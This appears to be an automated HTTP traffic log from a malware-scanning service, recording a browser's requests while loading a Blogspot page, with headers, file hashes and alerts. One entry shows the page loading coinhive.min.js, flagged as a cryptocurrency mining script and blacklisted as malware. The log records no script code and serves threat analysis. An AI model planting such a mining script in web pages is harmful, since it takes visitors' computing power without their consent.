Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"
Transfer-Encoding: chunked


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   21
Md5:    b9afc501fc43fbea335a2dc5d43263a1
Sha1:   7290a2dd6afbf39ecfc35b52dfb32a38fc222994
Sha256: d6e425ca7840c0ab6f26f5fc2822a47e26b4a8bbd104468a9c185bc132b8662f
                                        
                                            GET /lib/coinhive.min.js HTTP/1.1 
Host: coinhive.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         104.20.209.59
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Date: Fri, 10 Aug 2018 23:48:21 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=df512387507e0f3198ad95c5272bef0691533944901; expires=Sat, 10-Aug-19 23:48:21 GMT; path=/; domain=.coinhive.com; HttpOnly
Last-Modified: Wed, 11 Apr 2018 09:52:16 GMT
Etag: W/"5acddad0-40063"
Expires: Sat, 11 Aug 2018 07:48:21 GMT
Cache-Control: public, max-age=28800
Access-Control-Allow-Origin: *
Content-Encoding: gzip
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 44865a54189d4255-OSL


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   68258
Md5:    aace5e5a34519cdd9c971d57f21e5d82
Sha1:   ceecd09dbe85c771648f2ce6942fe9707c6f31f4
Sha256: ef2f23c272fb07e8e93f26cf6051bd2c3d377cf54e2431f9fdd6666852749e62

Alerts:
  urlquery:
    - Crypto currency mining script
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /-SVWRw06Y6UE/URLY5tAnjYI/AAAAAAAACFo/5FDTDhy13CA/s1600/page_bg.jpg HTTP/1.1 
Host: 1.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         216.58.211.1
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Access-Control-Expose-Headers: Content-Length
Etag: "v85a"
Expires: Sat, 11 Aug 2018 14:35:20 GMT
Content-Disposition: inline;filename="page_bg.jpg"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Fri, 10 Aug 2018 23:07:13 GMT
Server: fife
Content-Length: 1059
X-XSS-Protection: 1; mode=block
Age: 2468
Cache-Control: public, max-age=86400, no-transform


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.02
Size:   1059
Md5:    9acea5d99d3c880fc753d39eb92bc0d7
Sha1:   ffe9d40589c2e4f88502993f833369f73bcd521b
Sha256: 68797e20a3cff8df6abe093ef1911b632d9f5411991b2e0b57e03e8dc51ba98c
                                        
                                            GET /-AIW512aa4Ms/URJ2uXZh45I/AAAAAAAAB9c/QMul0JdxpNs/s1600/outerpic.png HTTP/1.1 
Host: 3.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         216.58.211.1
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Access-Control-Expose-Headers: Content-Length
Etag: "v7d7"
Expires: Sat, 04 Aug 2018 09:58:19 GMT
Content-Disposition: inline;filename="outerpic.png"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Fri, 10 Aug 2018 22:57:37 GMT
Server: fife
Content-Length: 340
X-XSS-Protection: 1; mode=block
Age: 3044
Cache-Control: public, max-age=86400, no-transform


--- Additional Info ---
Magic:  PNG image, 3 x 360, 8-bit/color RGB, non-interlaced
Size:   340
Md5:    80668175cbb798c380dd6b82f67db3c3
Sha1:   938f47d35c8f01aa839fb0f292dcba9f09a0aa31
Sha256: a6aea32e729e6d2b4f39f96e813d2841148a5f03badc23ccffe304cfde547c12
                                        
                                            GET /-UzQSVqe350A/URJhGaHsGqI/AAAAAAAAB7s/UVJaEnVxtc8/s1600/body.gif HTTP/1.1 
Host: 4.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         216.58.211.1
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Access-Control-Expose-Headers: Content-Length
Etag: "va1c"
Expires: Thu, 09 Aug 2018 20:51:03 GMT
Content-Disposition: inline;filename="body.gif"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Fri, 10 Aug 2018 22:56:20 GMT
Server: fife
Content-Length: 23343
X-XSS-Protection: 1; mode=block
Age: 3121
Cache-Control: public, max-age=86400, no-transform


--- Additional Info ---
Magic:  GIF image data, version 89a, 200 x 200
Size:   23343
Md5:    6f52f16e0c8869759029f92150fac68f
Sha1:   d7171b0111ecbc51953fb6a6a0fcb639c9aacdb2
Sha256: 0ba65009d2629977348e7cc30414a518b21b8fe7f50351fcead70764219b9bb2
                                        
                                            GET /-Es4rPAZpSEA/VO-9j025emI/AAAAAAAAAA8/v0-_VsrrI3I/s930/sun%2Blogo.png HTTP/1.1 
Host: 2.bp.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         216.58.211.1
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Access-Control-Expose-Headers: Content-Length
Etag: "v10"
Expires: Thu, 02 Aug 2018 06:02:43 GMT
Content-Disposition: inline;filename="sun logo.png"
Vary: Origin
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
X-Content-Type-Options: nosniff
Date: Fri, 10 Aug 2018 23:48:21 GMT
Server: fife
Content-Length: 5023
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400, no-transform
Age: 0


--- Additional Info ---
Magic:  PNG image, 50 x 50, 8-bit/color RGBA, non-interlaced
Size:   5023
Md5:    274bc928779def1365610c0e51789195
Sha1:   8d1b2e05bba12b0ac52b46cfa7e37e95cd6a02b5
Sha256: 998e30a5e683847ca81cb1063fd8465f6d2dd3a0473979d830c9f73165a5ac3f
                                        
                                            GET /s/oswald/v16/TK3iWkUHHAIjg752GT8A.woff HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fonts.googleapis.com/css?family=Oswald
Origin: http://efrumuseti.blogspot.com

                                         
                                         216.58.211.3
HTTP/1.1 200 OK
Content-Type: font/woff
                                        
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Content-Length: 18936
Date: Thu, 12 Jul 2018 10:26:14 GMT
Expires: Fri, 12 Jul 2019 10:26:14 GMT
Last-Modified: Tue, 07 Nov 2017 15:18:46 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 2553727


--- Additional Info ---
Magic:  data
Size:   18936
Md5:    ca70f49a133f08485bd05d5cb28ef8b7
Sha1:   9029570f276ed6b7d2895ced7175f958fb6c1c5f
Sha256: a7a4038c6fbb19ba522819188aed0ff204d80e19223b1cab388a290a8d5e47fe
                                        
                                            GET /tumblr_m1q5oflBvf1r2ub2xo1_500.gif HTTP/1.1 
Host: 25.media.tumblr.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         66.6.33.21
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
                                        
Server: openresty
Date: Fri, 10 Aug 2018 23:48:21 GMT
Content-Length: 182
Connection: keep-alive
Location: http://78.media.tumblr.com/tumblr_m1q5oflBvf1r2ub2xo1_500.gif


--- Additional Info ---
Magic:  HTML document text
Size:   182
Md5:    b9d44ae5ca75a352070be23a6e9c70f6
Sha1:   a3aa893ef50506ec0f1fdf60ccfbf5e48f142e81
Sha256: e3631af1efa5be63f728619833a5a8a23a1f72ca40d6f6b6c71d80bca51975c0
                                        
                                            GET /2012/05/blog-post_35.html HTTP/1.1 
Host: efrumuseti.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html
If-Modified-Since: Tue, 31 Jul 2018 18:38:32 GMT
If-None-Match: W/"4c826ae7bd5bcf6a68286bc6b26ca1cd920f7cad06c5fcc10cee29b2d5b4cacb"

                                         
                                         216.58.211.1
HTTP/1.1 304 Not Modified
                                        
Expires: Fri, 10 Aug 2018 23:48:21 GMT
Date: Fri, 10 Aug 2018 23:48:21 GMT
Cache-Control: private, max-age=0
Etag: W/"4c826ae7bd5bcf6a68286bc6b26ca1cd920f7cad06c5fcc10cee29b2d5b4cacb"
Server: GSE


--- Additional Info ---

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /img/icon18_wrench_allbkg.png HTTP/1.1 
Host: resources.blogblog.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         216.58.211.9
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Accept-Ranges: bytes
Content-Length: 475
Date: Sat, 04 Aug 2018 02:15:57 GMT
Expires: Sat, 11 Aug 2018 02:15:57 GMT
Last-Modified: Fri, 03 Aug 2018 20:30:58 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=604800
Age: 595945
Alt-Svc: quic=":443"; ma=2592000; v="44,43,39,35"


--- Additional Info ---
Magic:  PNG image, 18 x 18, 8-bit colormap, non-interlaced
Size:   475
Md5:    f617effe6d96c15acfea8b2e8aae551f
Sha1:   6d676af11ad2e84b620cce4d5992b657cb2d8ab6
Sha256: d172d750493be64a7ed84dec1dd2a0d787ba42f78bc694b0858f152c52b6620b
                                        
                                            GET /jquery-3.3.1.min.js HTTP/1.1 
Host: code.jquery.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         205.185.208.52
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Date: Fri, 10 Aug 2018 23:48:22 GMT
Connection: Keep-Alive
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 30288
Last-Modified: Sat, 20 Jan 2018 17:26:44 GMT
Server: nginx
Vary: Accept-Encoding
Etag: W/"5a637bd4-1538f"
Cache-Control: max-age=315360000
Access-Control-Allow-Origin: *
X-HW: 1533944901.dop001.sk1.t,1533944902.cds048.sk1.shn,1533944902.dop001.sk1.t,1533944902.cds008.sk1.c


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   30288
Md5:    d549b312f7a7d228b4ec229a6547dfdc
Sha1:   0766794582ad530ec0f8c2595f741086afffa312
Sha256: f6488b2915e0ceee723f4320492511d46c6ba1860d5975d085e6da8913f55f44
                                        
                                            GET /s/ptsansnarrow/v8/BngRUXNadjH0qYEzV7ab-oWlsbCGwRs.woff HTTP/1.1 
Host: fonts.gstatic.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fonts.googleapis.com/css?family=PT+Sans+Narrow
Origin: http://efrumuseti.blogspot.com

                                         
                                         216.58.211.3
HTTP/1.1 200 OK
Content-Type: font/woff
                                        
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Timing-Allow-Origin: *
Content-Length: 43448
Date: Fri, 13 Jul 2018 08:27:13 GMT
Expires: Sat, 13 Jul 2019 08:27:13 GMT
Last-Modified: Wed, 11 Oct 2017 18:30:35 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 2474469


--- Additional Info ---
Magic:  data
Size:   43448
Md5:    60264058b23ab6faa42699a5e0035dd0
Sha1:   14b7e7a94d024e4b3720b28afdf60287ea9a58a5
Sha256: 9cf3e7ccecfc228a2914f09141df6f86084e16da0a9a29b4d38613d6598cac1a
                                        
                                            GET /en_US/all.js HTTP/1.1 
Host: connect.facebook.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         31.13.72.12
HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
                                        
Access-Control-Expose-Headers: X-FB-Content-MD5
x-fb-content-md5: 59d56bf459b451e6cdb18f996be5932f
Etag: "94b9012f0e6c17b3df1596404e5a7738"
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000; preload; includeSubDomains
X-XSS-Protection: 0
X-Frame-Options: DENY
Timing-Allow-Origin: *
content-security-policy: default-src * data: blob:;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' *.atlassolutions.com blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net *.spotilocal.com:* wss://*.facebook.com:* https://fb.scanandcleanlocal.com:* *.atlassolutions.com attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self';
Cache-Control: public,max-age=1200,stale-while-revalidate=3600
Expires: Fri, 10 Aug 2018 23:55:27 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-MD5: pN71i0Xwwk8NVW/AyRmX5w==
X-FB-Debug: x2k2kGXZLZXViNS4NPSErNiP7FnaCeAINcRRZFXv/RLFAqf4c6fAUmeii3dSCg6pWfaDtTRW1k2/cnXQW8pjog==
Date: Fri, 10 Aug 2018 23:48:22 GMT
Connection: keep-alive
Content-Length: 64538


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   64538
Md5:    a4def58b45f0c24f0d556fc0c91997e7
Sha1:   aa312f8fcde3aca1a83e2c5c7afc454e2d12dff1
Sha256: ca5b939d4d01fed00b622a6551d7187de150faf638229b7f06ffc9ef5a3c6e8c
                                        
                                            GET /widgets.js HTTP/1.1 
Host: platform.twitter.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         93.184.220.66
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Content-Encoding: gzip
Cache-Control: public, max-age=1800
Date: Fri, 10 Aug 2018 23:48:22 GMT
Etag: "6a149d6ef4cd817b9ca0747ca86325e5+gzip"
Last-Modified: Thu, 09 Aug 2018 23:35:08 GMT
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Server: ECS (arn/4598)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 35362


--- Additional Info ---
Magic:  gzip compressed data, from Unix, last modified: Fri Aug 10 01:35:08 2018
Size:   35362
Md5:    b1a7b25869d2fdd659e9793bde870f99
Sha1:   bd5808b4927a37f9ca9f71c23161d18cff6f2f66
Sha256: a9354ca0faf35e9a4db1c551f77a71190cbb0f8fd33da2d912c23fa636066933
                                        
                                            GET /js/pinit_main.js?0.14683853060892227 HTTP/1.1 
Host: assets.pinterest.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         23.1.106.65
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
Etag: "2e530c3dfcfe2217743998ff4669ef00"
Content-Encoding: gzip
Accept-Ranges: bytes
Content-Length: 22634
Cache-Control: max-age=201
Connection: keep-alive
Vary: Accept-Encoding, Origin
X-CDN: akamai
Access-Control-Max-Age: 86400
Access-Control-Expose-Headers: X-CDN
Access-Control-Allow-Methods: GET
Access-Control-Allow-Origin: *


--- Additional Info ---
Magic:  gzip compressed data, from Unix, max speed
Size:   22634
Md5:    2e530c3dfcfe2217743998ff4669ef00
Sha1:   caeae3297fd7719cee44c3f3557a8c8812fc897e
Sha256: f43e966ec9735aeb2da8928a187228d8e2ad9365d5a47a9d3d23a573f4450253
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=169176
Date: Fri, 10 Aug 2018 23:48:22 GMT
Etag: "5b6dfcf3-1d7"
Expires: Sun, 12 Aug 2018 22:25:33 GMT
Last-Modified: Fri, 10 Aug 2018 21:00:35 GMT
Server: ECS (arn/4692)
X-Cache: HIT
Content-Length: 471


--- Additional Info ---
Magic:  data
Size:   471
Md5:    3c36198ed110a341a75973b683f00d88
Sha1:   50eb2f92d4a907a5104d3a24d9d04dbdc055c82c
Sha256: 2678c1b415422989aff64b72e635571a6fb363b1902de8d69bfda013cd6916a9
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=152579
Date: Fri, 10 Aug 2018 23:48:22 GMT
Etag: "5b6dc013-1d7"
Expires: Sun, 12 Aug 2018 18:06:42 GMT
Last-Modified: Fri, 10 Aug 2018 16:40:51 GMT
Server: ECS (arn/459B)
X-Cache: HIT
Content-Length: 471


--- Additional Info ---
Magic:  data
Size:   471
Md5:    152e5a5aee549f6189baefde1b095cc0
Sha1:   67c0618c9eb83ccbbdfca09125c5f7201fcb2415
Sha256: 4cac5020e7873c89e6b6e95ef65f8b1c9e5ceda1835d3b023ad1f494802b8de0
                                        
                                            POST /GTSGIAG3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 107
Content-Type: application/ocsp-request

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 10 Aug 2018 23:48:22 GMT
Cache-Control: public, max-age=86400
Server: ocsp_responder
Content-Length: 463
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN


--- Additional Info ---
Magic:  data
Size:   463
Md5:    0e6f52f0b1951c1d2de2a1f0e4bfe9b1
Sha1:   5928b04eaf8120c30d22ac08c8462fd078e700c6
Sha256: 2aef800b7488acbb925f3fa0e2dc80bc6916a48836e4ca6c1b7f3514c77d8ab4
                                        
                                            GET /connect/xd_arbiter/r/QX17B8fU-Vm.js?version=42 HTTP/1.1 
Host: staticxx.facebook.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         31.13.72.12
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
                                        
Expires: Fri, 09 Aug 2019 18:59:40 GMT
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Cache-Control: public,max-age=31536000,immutable
content-security-policy: default-src * data: blob:;script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.virtualearth.net *.google.com 127.0.0.1:* *.spotilocal.com:* 'unsafe-inline' 'unsafe-eval' *.atlassolutions.com blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net *.spotilocal.com:* wss://*.facebook.com:* https://fb.scanandcleanlocal.com:* *.atlassolutions.com attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self';
Vary: Accept-Encoding
Content-Encoding: gzip
X-FB-Debug: e59QOMNecliKlcQPiuVXfphqzZpVv/YTxaF1nwkdayAJjleEHUH/R0N1SqnIqSsoApF+GUnf63OWp6zbA5N/tw==
Date: Fri, 10 Aug 2018 23:48:22 GMT
Connection: keep-alive
Content-Length: 13900


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   13900
Md5:    ba32852787c29fd644701c0e989a9c26
Sha1:   6122e0345f8a8d90ff774b1bea0f9ea377f9aabc
Sha256: cd3c787e079a0b99012877bf53331224f933b799c3d30a8b5af366b34b03d227
                                        
                                            GET /feeds/posts/default?max-results=6&orderby=published&alt=json-in-script&callback=showrecentposts2 HTTP/1.1 
Host: efrumuseti.blogspot.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         216.58.211.1
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
                                        
Etag: W/"63aff54ad05a5ec5ccfe352c1d8cb5e4ebc484d231ae91867e673b2944d1ff8f"
Date: Fri, 10 Aug 2018 23:48:22 GMT
Server: blogger-renderd
Expires: Tue, 07 Aug 2018 18:24:56 GMT
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Last-Modified: Tue, 31 Jul 2018 18:38:32 GMT
Content-Encoding: gzip
Content-Length: 1614
X-Frame-Options: SAMEORIGIN
Cache-Control: public, must-revalidate, proxy-revalidate, max-age=1
Age: 0


--- Additional Info ---
Magic:  gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT)
Size:   1614
Md5:    d81bbd0df21e59a586dae4175e787d51
Sha1:   9a59b0b19a938195f39e5a9bba2fbc5c0a7279ce
Sha256: 0dcf69ee99bb1ef114ca71840b6a4e85e508c3698b42849ed213caddd97c0e70
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Cache-Control: max-age=171522
Date: Fri, 10 Aug 2018 23:48:22 GMT
Etag: "5b6e041e-1d7"
Expires: Sun, 12 Aug 2018 23:21:01 GMT
Last-Modified: Fri, 10 Aug 2018 21:31:10 GMT
Server: ECS (arn/45E2)
X-Cache: HIT
Content-Length: 471


--- Additional Info ---
Magic:  data
Size:   471
Md5:    c87fb60ef0d63c1d56cd8be9aa43bfdc
Sha1:   35cb4bc5a0fa7f9ca54e27980be106a29feebf61
Sha256: fde6789ce67ba90bd3ba879d6dc4b88792e5214ed74c4ab32010926274c7e831
                                        
                                            GET /js/plusone.js HTTP/1.1 
Host: apis.google.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://efrumuseti.blogspot.com/2012/05/blog-post_35.html

                                         
                                         216.58.211.14
HTTP/1.1 200 OK
Content-Type: application/javascript; charset=utf-8
                                        
x-ua-compatible: IE=edge, chrome=1
Timing-Allow-Origin: *
Etag: "23e3c2c885cba5ab54b0493a749cb55a"
Expires: Fri, 10 Aug 2018 23:48:22 GMT
Date: Fri, 10 Aug 2018 23:48:22 GMT
